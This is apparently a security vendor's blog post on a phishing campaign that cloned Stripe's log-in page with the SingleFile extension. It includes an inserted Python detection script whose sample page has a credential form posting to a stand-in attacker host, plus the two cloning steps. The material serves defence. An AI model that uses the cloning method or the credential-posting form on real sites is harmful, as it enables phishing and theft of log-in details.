by Samuel P Wang (Fraud Researcher)
The effectiveness of phishing makes it a permanent staple of cybercrime. The concept behind phishing itself is simple — lure an unsuspecting victim into downloading a file or clicking a link by posing as something legitimate — but the strategies used by cybercriminals have become increasingly sophisticated. While searching for phishing pages with unique log-in characteristics, we came upon a phishing attack that uses a legitimate tool called SingleFile as an obfuscation method to avoid detection.
SingleFile is a web extension for Google Chrome and Mozilla Firefox that allows users to save a webpage as a single HTML file. Although web browsers allow users to save pages as an “.htm” document, this often means multiple folders for the different files used in the webpage. By saving a page, required files and all, on a single HTML document, SingleFile streamlines the process, making it convenient for various use cases like archiving websites. However, its usefulness is not lost on threat actors, as we have found them abusing SingleFile to obfuscate phishing attacks.
Figure 1. Tool options for the Chrome version of SingleFile
We found samples that show cybercriminals using SingleFile to copy the log-in pages of legitimate websites as part of a phishing campaign. The method through which the log-in pages are generated is very simple:
- The attackers access the log-in page of the website that is to be spoofed (the payment processing website Stripe is used in the sample we found).
- They then use SingleFile to save and generate a file which contains the whole page, including any pictures (which will be saved as svg files).
Despite its simplicity, the spoofing method looks to be very effective, as it essentially generates an identical copy of the legitimate log-in page.
Figure 2. Comparison of the original Stripe log-in page (top) with the spoofed one based on the generated SingleFile page (bottom). The only noticeable difference is the URL.
Figure 3. Code showing images that are saved as .svg files with base64 encoding
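The two traits described above (a page captured from one origin, with its images inlined as base64 SVG data URIs, whose credential form now posts elsewhere) can be turned into a simple triage check. The script below is an added example, not code from the original post or from the SingleFile project; it assumes SingleFile's default "Page saved with SingleFile / url: / saved date:" header comment is present, and the sample HTML and hostnames are constructed.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: a stripped-down imitation of a SingleFile-saved log-in
# page whose form the attacker has re-pointed to their own server.
# Assumption: SingleFile's default header comment (url / saved date) is kept.
SAMPLE_HTML = """<!--
 Page saved with SingleFile
 url: https://dashboard.stripe.example/login
 saved date: Sun Feb 10 2019 15:34:24 GMT+0000
--><!DOCTYPE html><html><head><title>Sign in</title></head>
<body><img src="data:image/svg+xml;base64,PHN2Zy8+">
<form method="post" action="https://collector.attacker.example/login.php">
<input name="email"><input type="password" name="password"></form></body></html>"""

SAVED_URL_RE = re.compile(r"Page saved with SingleFile.*?url:\s*(\S+)", re.S)
INLINE_SVG_RE = re.compile(r"data:image/svg\+xml;base64,", re.I)


class FormCollector(HTMLParser):
    """Collects <form action> targets and notes whether a password field exists."""
    def __init__(self):
        super().__init__()
        self.actions, self.has_password = [], False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form" and a.get("action"):
            self.actions.append(a["action"])
        if tag == "input" and (a.get("type") or "").lower() == "password":
            self.has_password = True


def analyze(html):
    """Return indicators that `html` is a SingleFile capture of a log-in page
    whose credential form posts to a host other than the captured origin."""
    m = SAVED_URL_RE.search(html)
    saved_host = urlparse(m.group(1)).hostname if m else None
    p = FormCollector()
    p.feed(html)
    # Relative actions have no hostname and stay with the serving site; only
    # absolute actions pointing at a different host are counted as foreign.
    foreign = [a for a in p.actions
               if urlparse(a).hostname and urlparse(a).hostname != saved_host]
    return {
        "singlefile_header": m is not None,
        "saved_host": saved_host,
        "inline_svg_count": len(INLINE_SVG_RE.findall(html)),
        "has_password_field": p.has_password,
        "foreign_form_actions": foreign,
        "suspicious": m is not None and p.has_password and bool(foreign),
    }
```

Run `analyze()` over HTML attachments or fetched landing pages; a hit on all three indicators is a strong signal worth escalating, while a captured page with only a relative form action is more likely an ordinary archive.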
The attacks were fairly recent: the mail campaign started on February 27, 2019, and the sample we found had been saved by the attacker on February 10, 2019.
Note that while this entry demonstrates SingleFile being used for a malicious purpose, the abuse does not affect the security of the extension or its users.
Recommendations and solutions
Both individuals and organizations can minimize the threat of this attack, and phishing in general, by adhering to standard best practices designed to fight phishing. These include the following:
- Any website that has an unusual URL is probably malicious, as most company websites carry their name or the name of one of their brands.
- Some threat actors create URLs that look similar to the URL of an official website. Therefore, users should double-check whether the website they’re visiting uses the correct URL. This can be accomplished by something as simple as querying a search engine.
- Users should avoid clicking on any links or downloading any files they receive via email unless they are absolutely certain that the sender is legitimate.
For a more comprehensive security suite, organizations can consider technology such as the Trend Micro™ Cloud App Security™ solution, which employs machine learning (ML) to perform web reputation and URL dynamic analysis. It can also detect suspicious content in the message body and attachments, and provides sandbox malware analysis and document exploit detection.
Meanwhile, the Trend Micro™ Web Reputation Service can protect users from unique obfuscation methods such as the one we described. Web Reputation Service determines the credibility of web domains by assigning a reputation score based on factors such as age, historical location changes, and any indicators of suspicious activities discovered through malware behavior analysis. It then continues to scan sites and block users from accessing infected ones.
Indicators of Compromise (IoCs)
Updated on April 8, 2019 at 10:59 PM EST to fix a typographical error in the IoC URL